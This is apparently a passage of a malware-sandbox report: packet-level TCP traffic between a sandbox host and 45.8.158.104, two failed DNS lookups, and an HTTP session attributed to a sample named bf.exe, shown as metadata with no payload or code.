Oct 13, 2022 09:30:54.798100948 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.798155069 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.798202991 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.798213005 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.798259020 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.798274040 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.798321009 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.798333883 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.798378944 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.798378944 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.798425913 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.798439980 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.798485041 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.798501015 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.798543930 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.798567057 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.798615932 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.798615932 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.798665047 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.838490963 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.838553905 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.838618040 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.838654041 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.838696003 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.838768959 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.840308905 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.840384960 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.840446949 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.840466976 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.840466976 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.840503931 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.840518951 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.840578079 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.840584993 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.840646029 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.840655088 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.840718985 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.840719938 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.840779066 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.840790987 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.840851068 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.840857029 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.840913057 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.840914011 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.840966940 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.840981960 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.841036081 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.841049910 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.841106892 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.841116905 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.841169119 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.841171980 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.841223001 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.841236115 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.841295004 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.841304064 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.841362000 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.841367960 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.841418028 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.841427088 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.841475010 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.881469011 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.881541014 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.881583929 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.881630898 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.881767988 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.882855892 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.882966042 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.882992983 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.882992983 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.883024931 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.883059978 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.883061886 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.883080006 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.883101940 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.883142948 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.883158922 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.883183956 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.883208036 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.883215904 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.883264065 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.883289099 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:55.414316893 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:55.506730080 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:55.749187946 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:55.749217033 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:55.749335051 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:31:45.808962107 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Oct 13, 2022 09:29:33.001714945 CEST | 56894 | 53 | 192.168.2.5 | 8.8.8.8 |
Oct 13, 2022 09:29:33.023427963 CEST | 53 | 56894 | 8.8.8.8 | 192.168.2.5 |
Oct 13, 2022 09:31:41.033104897 CEST | 50295 | 53 | 192.168.2.5 | 8.8.8.8 |
Oct 13, 2022 09:31:41.053165913 CEST | 53 | 50295 | 8.8.8.8 | 192.168.2.5 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Oct 13, 2022 09:29:33.001714945 CEST | 192.168.2.5 | 8.8.8.8 | 0x26f4 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 13, 2022 09:31:41.033104897 CEST | 192.168.2.5 | 8.8.8.8 | 0x84d8 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Oct 13, 2022 09:29:33.023427963 CEST | 8.8.8.8 | 192.168.2.5 | 0x26f4 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Oct 13, 2022 09:31:41.053165913 CEST | 8.8.8.8 | 192.168.2.5 | 0x84d8 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.5 | 49696 | 45.8.158.104 | 80 | C:\Users\user\Desktop\bf.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Oct 13, 2022 09:30:53.311197996 CEST | 1 | OUT | |
Oct 13, 2022 09:30:53.640887022 CEST | 2 | IN |